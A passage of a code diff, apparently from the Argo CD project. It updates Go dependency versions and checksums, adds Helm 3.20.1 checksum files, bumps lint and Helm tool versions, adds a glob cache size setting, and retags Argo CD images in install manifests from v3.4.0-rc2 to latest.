+	github.com/aws/aws-sdk-go-v2/service/signin v1.0.8 // indirect
 	github.com/aws/aws-sdk-go-v2/service/sqs v1.38.1 // indirect
-	github.com/aws/aws-sdk-go-v2/service/sso v1.30.12 // indirect
-	github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.16 // indirect
-	github.com/aws/aws-sdk-go-v2/service/sts v1.41.8
+	github.com/aws/aws-sdk-go-v2/service/sso v1.30.13 // indirect
+	github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.17 // indirect
+	github.com/aws/aws-sdk-go-v2/service/sts v1.41.9
 	github.com/aws/smithy-go v1.24.2
 	github.com/beorn7/perks v1.0.1 // indirect
 	github.com/blang/semver/v4 v4.0.0 // indirect
@@ -208,7 +209,6 @@ require (
 	github.com/go-viper/mapstructure/v2 v2.5.0 // indirect
 	github.com/golang-jwt/jwt/v4 v4.5.2 // indirect
 	github.com/golang/glog v1.2.5 // indirect
-	github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect
 	github.com/google/go-querystring v1.2.0 // indirect
 	github.com/google/s2a-go v0.1.9 // indirect
 	github.com/googleapis/enterprise-certificate-proxy v0.3.4 // indirect
--- a/go.sum
+++ b/go.sum
@@ -128,10 +128,10 @@ github.com/aws/aws-sdk-go-v2 v1.41.4 h1:10f50G7WyU02T56ox1wWXq+zTX9I1zxG46HYuG1h
 github.com/aws/aws-sdk-go-v2 v1.41.4/go.mod h1:mwsPRE8ceUUpiTgF7QmQIJ7lgsKUPQOUl3o72QBrE1o=
 github.com/aws/aws-sdk-go-v2/config v1.32.11 h1:ftxI5sgz8jZkckuUHXfC/wMUc8u3fG1vQS0plr2F2Zs=
 github.com/aws/aws-sdk-go-v2/config v1.32.11/go.mod h1:twF11+6ps9aNRKEDimksp923o44w/Thk9+8YIlzWMmo=
-github.com/aws/aws-sdk-go-v2/credentials v1.19.11 h1:NdV8cwCcAXrCWyxArt58BrvZJ9pZ9Fhf9w6Uh5W3Uyc=
-github.com/aws/aws-sdk-go-v2/credentials v1.19.11/go.mod h1:30yY2zqkMPdrvxBqzI9xQCM+WrlrZKSOpSJEsylVU+8=
-github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.19 h1:INUvJxmhdEbVulJYHI061k4TVuS3jzzthNvjqvVvTKM=
-github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.19/go.mod h1:FpZN2QISLdEBWkayloda+sZjVJL+e9Gl0k1SyTgcswU=
+github.com/aws/aws-sdk-go-v2/credentials v1.19.12 h1:oqtA6v+y5fZg//tcTWahyN9PEn5eDU/Wpvc2+kJ4aY8=
+github.com/aws/aws-sdk-go-v2/credentials v1.19.12/go.mod h1:U3R1RtSHx6NB0DvEQFGyf/0sbrpJrluENHdPy1j/3TE=
+github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.20 h1:zOgq3uezl5nznfoK3ODuqbhVg1JzAGDUhXOsU0IDCAo=
+github.com/aws/aws-sdk-go-v2/feature/ec2/imds v1.18.20/go.mod h1:z/MVwUARehy6GAg/yQ1GO2IMl0k++cu1ohP9zo887wE=
 github.com/aws/aws-sdk-go-v2/internal/configsources v1.4.20 h1:CNXO7mvgThFGqOFgbNAP2nol2qAWBOGfqR/7tQlvLmc=
 github.com/aws/aws-sdk-go-v2/internal/configsources v1.4.20/go.mod h1:oydPDJKcfMhgfcgBUZaG+toBbwy8yPWubJXBVERtI4o=
 github.com/aws/aws-sdk-go-v2/internal/endpoints/v2 v2.7.20 h1:tN6W/hg+pkM+tf9XDkWUbDEjGLb+raoBMFsTodcoYKw=
@@ -140,22 +140,22 @@ github.com/aws/aws-sdk-go-v2/internal/ini v1.8.5 h1:clHU5fm//kWS1C2HgtgWxfQbFbx4
 github.com/aws/aws-sdk-go-v2/internal/ini v1.8.5/go.mod h1:O3h0IK87yXci+kg6flUKzJnWeziQUKciKrLjcatSNcY=
 github.com/aws/aws-sdk-go-v2/service/codecommit v1.33.11 h1:R3S5odXTsflG7xUp9S2AsewSXtQi1LBd+stJ5OpCIog=
 github.com/aws/aws-sdk-go-v2/service/codecommit v1.33.11/go.mod h1:OekzWXyZi3ptl+YoKmm+G5ODIa4BDEArvZv8gHrQb5s=
-github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.6 h1:XAq62tBTJP/85lFD5oqOOe7YYgWxY9LvWq8plyDvDVg=
-github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.6/go.mod h1:x0nZssQ3qZSnIcePWLvcoFisRXJzcTVvYpAAdYX8+GI=
-github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.19 h1:X1Tow7suZk9UCJHE1Iw9GMZJJl0dAnKXXP1NaSDHwmw=
-github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.19/go.mod h1:/rARO8psX+4sfjUQXp5LLifjUt8DuATZ31WptNJTyQA=
+github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.7 h1:5EniKhLZe4xzL7a+fU3C2tfUN4nWIqlLesfrjkuPFTY=
+github.com/aws/aws-sdk-go-v2/service/internal/accept-encoding v1.13.7/go.mod h1:x0nZssQ3qZSnIcePWLvcoFisRXJzcTVvYpAAdYX8+GI=
+github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.20 h1:2HvVAIq+YqgGotK6EkMf+KIEqTISmTYh5zLpYyeTo1Y=
+github.com/aws/aws-sdk-go-v2/service/internal/presigned-url v1.13.20/go.mod h1:V4X406Y666khGa8ghKmphma/7C0DAtEQYhkq9z4vpbk=
 github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi v1.31.8 h1:mGgiunl7ZwOwhpJwJNF4JfsZFYJp08wjyS3NqFQe3ws=
 github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi v1.31.8/go.mod h1:KdM2EhXeHfeBQz5keOvv/FM7kbesjCWm7HEEyJe3frs=
-github.com/aws/aws-sdk-go-v2/service/signin v1.0.7 h1:Y2cAXlClHsXkkOvWZFXATr34b0hxxloeQu/pAZz2row=
-github.com/aws/aws-sdk-go-v2/service/signin v1.0.7/go.mod h1:idzZ7gmDeqeNrSPkdbtMp9qWMgcBwykA7P7Rzh5DXVU=
+github.com/aws/aws-sdk-go-v2/service/signin v1.0.8 h1:0GFOLzEbOyZABS3PhYfBIx2rNBACYcKty+XGkTgw1ow=
+github.com/aws/aws-sdk-go-v2/service/signin v1.0.8/go.mod h1:LXypKvk85AROkKhOG6/YEcHFPoX+prKTowKnVdcaIxE=
 github.com/aws/aws-sdk-go-v2/service/sqs v1.38.1 h1:ZtgZeMPJH8+/vNs9vJFFLI0QEzYbcN0p7x1/FFwyROc=
 github.com/aws/aws-sdk-go-v2/service/sqs v1.38.1/go.mod h1:Bar4MrRxeqdn6XIh8JGfiXuFRmyrrsZNTJotxEJmWW0=
-github.com/aws/aws-sdk-go-v2/service/sso v1.30.12 h1:iSsvB9EtQ09YrsmIc44Heqlx5ByGErqhPK1ZQLppias=
-github.com/aws/aws-sdk-go-v2/service/sso v1.30.12/go.mod h1:fEWYKTRGoZNl8tZ77i61/ccwOMJdGxwOhWCkp6TXAr0=
-github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.16 h1:EnUdUqRP1CNzt2DkV67tJx6XDN4xlfBFm+bzeNOQVb0=
-github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.16/go.mod h1:Jic/xv0Rq/pFNCh3WwpH4BEqdbSAl+IyHro8LbibHD8=
-github.com/aws/aws-sdk-go-v2/service/sts v1.41.8 h1:XQTQTF75vnug2TXS8m7CVJfC2nniYPZnO1D4Np761Oo=
-github.com/aws/aws-sdk-go-v2/service/sts v1.41.8/go.mod h1:Xgx+PR1NUOjNmQY+tRMnouRp83JRM8pRMw/vCaVhPkI=
+github.com/aws/aws-sdk-go-v2/service/sso v1.30.13 h1:kiIDLZ005EcKomYYITtfsjn7dtOwHDOFy7IbPXKek2o=
+github.com/aws/aws-sdk-go-v2/service/sso v1.30.13/go.mod h1:2h/xGEowcW/g38g06g3KpRWDlT+OTfxxI0o1KqayAB8=
+github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.17 h1:jzKAXIlhZhJbnYwHbvUQZEB8KfgAEuG0dc08Bkda7NU=
+github.com/aws/aws-sdk-go-v2/service/ssooidc v1.35.17/go.mod h1:Al9fFsXjv4KfbzQHGe6V4NZSZQXecFcvaIF4e70FoRA=
+github.com/aws/aws-sdk-go-v2/service/sts v1.41.9 h1:Cng+OOwCHmFljXIxpEVXAGMnBia8MSU6Ch5i9PgBkcU=
+github.com/aws/aws-sdk-go-v2/service/sts v1.41.9/go.mod h1:LrlIndBDdjA/EeXeyNBle+gyCwTlizzW5ycgWnvIxkk=
 github.com/aws/smithy-go v1.24.2 h1:FzA3bu/nt/vDvmnkg+R8Xl46gmzEDam6mZ1hzmwXFng=
 github.com/aws/smithy-go v1.24.2/go.mod h1:YE2RhdIuDbA5E5bTdciG9KrW3+TiEONeUWCqxX9i1Fc=
 github.com/beevik/ntp v0.2.0/go.mod h1:hIHWr+l3+/clUnF44zdK+CWW7fO8dR5cIylAQ76NRpg=
@@ -1404,8 +1404,8 @@ google.golang.org/grpc v1.30.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM
 google.golang.org/grpc v1.31.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
 google.golang.org/grpc v1.32.0/go.mod h1:N36X2cJ7JwdamYAgDz+s+rVMFjt3numwzf/HckM8pak=
 google.golang.org/grpc v1.33.1/go.mod h1:fr5YgcSWrqhRRxogOsw7RzIpsmvOZ6IcH4kBYTpR3n0=
-google.golang.org/grpc v1.79.2 h1:fRMD94s2tITpyJGtBBn7MkMseNpOZU8ZxgC3MMBaXRU=
-google.golang.org/grpc v1.79.2/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ=
+google.golang.org/grpc v1.79.3 h1:sybAEdRIEtvcD68Gx7dmnwjZKlyfuc61Dyo9pGXXkKE=
+google.golang.org/grpc v1.79.3/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ=
 google.golang.org/protobuf v1.22.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
 google.golang.org/protobuf v1.23.1-0.20200526195155-81db48ad09cc/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU=
 google.golang.org/protobuf v1.24.0/go.mod h1:r/3tXBNzIEhYS9I1OUVjXDlt8tc493IdKGjtUeSXeh4=
--- a/hack/installers/checksums/helm-v3.20.1-darwin-amd64.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-darwin-amd64.tar.gz.sha256
@@ -0,0 +1 @@
+580515b544d5c966edc6f782c9ae88e21a9e10c786a7d6c5fd4b52613f321076  helm-v3.20.1-darwin-amd64.tar.gz
--- a/hack/installers/checksums/helm-v3.20.1-darwin-arm64.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-darwin-arm64.tar.gz.sha256
@@ -0,0 +1 @@
+75cc96ac3fe8b8b9928eb051e55698e98d1e026967b6bffe4f0f3c538a551b65  helm-v3.20.1-darwin-arm64.tar.gz
--- a/hack/installers/checksums/helm-v3.20.1-linux-amd64.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-linux-amd64.tar.gz.sha256
@@ -0,0 +1 @@
+0165ee4a2db012cc657381001e593e981f42aa5707acdd50658326790c9d0dc3  helm-v3.20.1-linux-amd64.tar.gz
--- a/hack/installers/checksums/helm-v3.20.1-linux-arm64.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-linux-arm64.tar.gz.sha256
@@ -0,0 +1 @@
+56b9d1b0e0efbb739be6e68a37860ace8ec9c7d3e6424e3b55d4c459bc3a0401  helm-v3.20.1-linux-arm64.tar.gz
--- a/hack/installers/checksums/helm-v3.20.1-linux-ppc64le.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-linux-ppc64le.tar.gz.sha256
@@ -0,0 +1 @@
+77b7d9bc62b209c044b873bc773055c5c0d17ef055e54c683f33209ebbe8883c  helm-v3.20.1-linux-ppc64le.tar.gz
--- a/hack/installers/checksums/helm-v3.20.1-linux-s390x.tar.gz.sha256
+++ b/hack/installers/checksums/helm-v3.20.1-linux-s390x.tar.gz.sha256
@@ -0,0 +1 @@
+3c43d45149a425c7bf15ba3653ddee13e7b1a4dd6d4534397b6f317f83c51b58  helm-v3.20.1-linux-s390x.tar.gz
--- a/hack/installers/install-lint-tools.sh
+++ b/hack/installers/install-lint-tools.sh
@@ -2,6 +2,6 @@
 set -eux -o pipefail

 # renovate: datasource=go packageName=github.com/golangci/golangci-lint/v2
-GOLANGCI_LINT_VERSION=2.11.3
+GOLANGCI_LINT_VERSION=2.11.4

 GO111MODULE=on go install "github.com/golangci/golangci-lint/v2/cmd/golangci-lint@v${GOLANGCI_LINT_VERSION}"
--- a/hack/tool-versions.sh
+++ b/hack/tool-versions.sh
@@ -11,7 +11,7 @@
 # Use ./hack/installers/checksums/add-helm-checksums.sh and
 # add-kustomize-checksums.sh to help download checksums.
 ###############################################################################
-helm3_version=3.19.4
+helm3_version=3.20.1
 kustomize5_version=5.8.1
 protoc_version=29.3
 oras_version=1.2.0
--- a/manifests/base/commit-server/kustomization.yaml
+++ b/manifests/base/commit-server/kustomization.yaml
@@ -12,4 +12,4 @@ resources:
 images:
 - name: quay.io/argoproj/argocd
  newName: quay.io/argoproj/argocd
-  newTag: v3.4.0-rc2
+  newTag: latest
--- a/manifests/base/kustomization.yaml
+++ b/manifests/base/kustomization.yaml
@@ -5,7 +5,7 @@ kind: Kustomization
 images:
 - name: quay.io/argoproj/argocd
  newName: quay.io/argoproj/argocd
-  newTag: v3.4.0-rc2
+  newTag: latest
 resources:
 - ./application-controller
 - ./dex
--- a/manifests/base/server/argocd-server-deployment.yaml
+++ b/manifests/base/server/argocd-server-deployment.yaml
@@ -316,6 +316,12 @@ spec:
                  name: argocd-cmd-params-cm
                  key: server.webhook.parallelism.limit
                  optional: true
+            - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+              valueFrom:
+                configMapKeyRef:
+                  name: argocd-cmd-params-cm
+                  key: server.glob.cache.size
+                  optional: true
            - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
              valueFrom:
                configMapKeyRef:
--- a/manifests/core-install-with-hydrator.yaml
+++ b/manifests/core-install-with-hydrator.yaml
@@ -31332,7 +31332,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -31473,7 +31473,7 @@ spec:
              key: log.format.timestamp
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -31601,7 +31601,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -31910,7 +31910,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -31963,7 +31963,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -32366,7 +32366,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/core-install.yaml
+++ b/manifests/core-install.yaml
@@ -31300,7 +31300,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -31429,7 +31429,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -31738,7 +31738,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -31791,7 +31791,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -32194,7 +32194,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/core-install/kustomization.yaml
+++ b/manifests/core-install/kustomization.yaml
@@ -12,4 +12,4 @@ resources:
 images:
 - name: quay.io/argoproj/argocd
  newName: quay.io/argoproj/argocd
-  newTag: v3.4.0-rc2
+  newTag: latest
--- a/manifests/ha/base/kustomization.yaml
+++ b/manifests/ha/base/kustomization.yaml
@@ -12,7 +12,7 @@ patches:
 images:
 - name: quay.io/argoproj/argocd
  newName: quay.io/argoproj/argocd
-  newTag: v3.4.0-rc2
+  newTag: latest
 resources:
 - ../../base/application-controller
 - ../../base/applicationset-controller
--- a/manifests/ha/install-with-hydrator.yaml
+++ b/manifests/ha/install-with-hydrator.yaml
@@ -32758,7 +32758,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -32899,7 +32899,7 @@ spec:
              key: log.format.timestamp
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -33057,7 +33057,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -33159,7 +33159,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -33283,7 +33283,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -33618,7 +33618,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -33671,7 +33671,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -34058,6 +34058,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -34100,7 +34106,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -34532,7 +34538,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/ha/install.yaml
+++ b/manifests/ha/install.yaml
@@ -32728,7 +32728,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -32887,7 +32887,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -32989,7 +32989,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -33113,7 +33113,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -33448,7 +33448,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -33501,7 +33501,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -33888,6 +33888,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -33930,7 +33936,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -34362,7 +34368,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/ha/namespace-install-with-hydrator.yaml
+++ b/manifests/ha/namespace-install-with-hydrator.yaml
@@ -2005,7 +2005,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -2146,7 +2146,7 @@ spec:
              key: log.format.timestamp
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -2304,7 +2304,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -2406,7 +2406,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -2530,7 +2530,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -2865,7 +2865,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -2918,7 +2918,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -3305,6 +3305,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -3347,7 +3353,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -3779,7 +3785,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/ha/namespace-install.yaml
+++ b/manifests/ha/namespace-install.yaml
@@ -1975,7 +1975,7 @@ spec:
              key: applicationsetcontroller.status.max.resources.count
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-applicationset-controller
        ports:
@@ -2134,7 +2134,7 @@ spec:
        - -n
        - /usr/local/bin/argocd
        - /shared/argocd-dex
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: copyutil
        securityContext:
@@ -2236,7 +2236,7 @@ spec:
              key: notificationscontroller.repo.server.plaintext
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          tcpSocket:
@@ -2360,7 +2360,7 @@ spec:
        - argocd
        - admin
        - redis-initial-password
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: IfNotPresent
        name: secret-init
        securityContext:
@@ -2695,7 +2695,7 @@ spec:
          value: /helm-working-dir
        - name: HELM_DATA_HOME
          value: /helm-working-dir
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          failureThreshold: 3
@@ -2748,7 +2748,7 @@ spec:
        command:
        - sh
        - -c
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        name: copyutil
        securityContext:
          allowPrivilegeEscalation: false
@@ -3135,6 +3135,12 @@ spec:
              key: server.webhook.parallelism.limit
              name: argocd-cmd-params-cm
              optional: true
+        - name: ARGOCD_SERVER_GLOB_CACHE_SIZE
+          valueFrom:
+            configMapKeyRef:
+              key: server.glob.cache.size
+              name: argocd-cmd-params-cm
+              optional: true
        - name: ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_NEW_GIT_FILE_GLOBBING
          valueFrom:
            configMapKeyRef:
@@ -3177,7 +3183,7 @@ spec:
              key: server.sync.replace.allowed
              name: argocd-cmd-params-cm
              optional: true
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        livenessProbe:
          httpGet:
@@ -3609,7 +3615,7 @@ spec:
              optional: true
        - name: KUBECACHEDIR
          value: /tmp/kubecache
-        image: quay.io/argoproj/argocd:v3.4.0-rc2
+        image: quay.io/argoproj/argocd:latest
        imagePullPolicy: Always
        name: argocd-application-controller
        ports:
--- a/manifests/install-with-hydrator.yaml
+++ b/manifests/install-with-hydrator.yaml
@@ -31776,7 +31776,7 @@ spec:
